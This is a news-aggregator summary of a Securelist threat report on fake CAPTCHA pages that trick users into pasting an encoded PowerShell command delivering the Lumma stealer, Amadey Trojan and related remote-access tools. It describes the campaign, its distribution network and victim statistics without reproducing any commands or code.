A naukri.com initiative
Securelist
1M
109
Image Credit: Securelist
Lumma/Amadey: fake CAPTCHAs want to know if you’re human
- Attackers are distributing malware through a fake CAPTCHA as the initial infection vector, which primarily targets gamers by delivering Lumma stealer through websites hosting cracked games.
- The malicious CAPTCHA is spreading through various online resources that have nothing to do with games such as adult sites, anime resources, file-sharing services, betting platforms, and web apps monetizing through traffic now expanding its distribution network to a broader pool of victims.
- Researchers have found that the ad network pushing pages with a malicious CAPTCHA also includes legitimate non-malicious offers where clicking anywhere on a page using the ad module redirects the user to other resources.
- The CAPTCHA delivers not only Lumma but also the Amadey Trojan, making it essential to understand how the attackers and their distribution network operate to avoid falling for the attack.
- Unlike genuine CAPTCHAs designed to protect websites from bots, this imitation serves to promote shady resources.
- The Trojans are distributed through CAPTCHAs with instructions. Once the victim clicks the 'I'm not a robot' button, it copies a line containing Base64-encoded PowerShell commands.
- The malicious PowerShell script ultimately downloads the malicious payload through an obfuscated PowerShell script that steals credentials and cryptocurrency wallets.
- The Lumma stealer searches for files related to cryptocurrencies and steals them, views browser extensions for cryptocurrencies, steals data from them, and searches for password manager archives to exfiltrate their contents to the attackers’ server.
- The same campaign is now spreading the Amadey Trojan credential stealer, VNC system credential stealer, and Remcos remote access tool to the victim’s device, giving the attackers full access to it.
- 140,000 users encountered ad scripts, out of which 20,000+ users were redirected to infected sites that saw fake update notifications or fake CAPTCHAs. Users in Brazil, Spain, Italy, and Russia were most frequently affected.
Read Full Article
6 Likes
For uninterrupted reading, download the app